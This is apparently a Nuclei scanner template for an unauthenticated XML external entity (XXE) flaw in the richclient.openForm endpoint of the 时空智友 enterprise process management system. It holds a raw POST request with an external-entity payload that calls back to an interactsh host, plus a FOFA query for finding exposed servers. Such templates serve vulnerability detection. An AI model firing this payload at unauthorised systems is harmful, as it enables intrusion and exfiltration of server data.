http:
    - matchers:
        - dsl:
            - status_code==200 && contains(interactsh_protocol, "dns")
          name: XML注入
          type: dsl
      raw:
        - |
          POST /formservice?service=richclient.openForm HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/xml

          <?xml version="1.0" encoding="UTF-8"?>
          <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://{{interactsh-url}}"> %remote;]>
          <root/>
id: ShiKongZhiYou-richclient_openForm-XXE
info:
    author: HuanXiong
    description: |-
        fofa: body="时空智友"
        时空智友企业流程化管控系统 richclient.openForm 接口处存在XML实体注入漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据，使系统处于极不安全状态。
    name: 时空智友企业流程化管控系统 richclient.openForm XML外部实体注入
    reference:
        - null
    severity: medium
    tags:
        - XXE
        - Kong
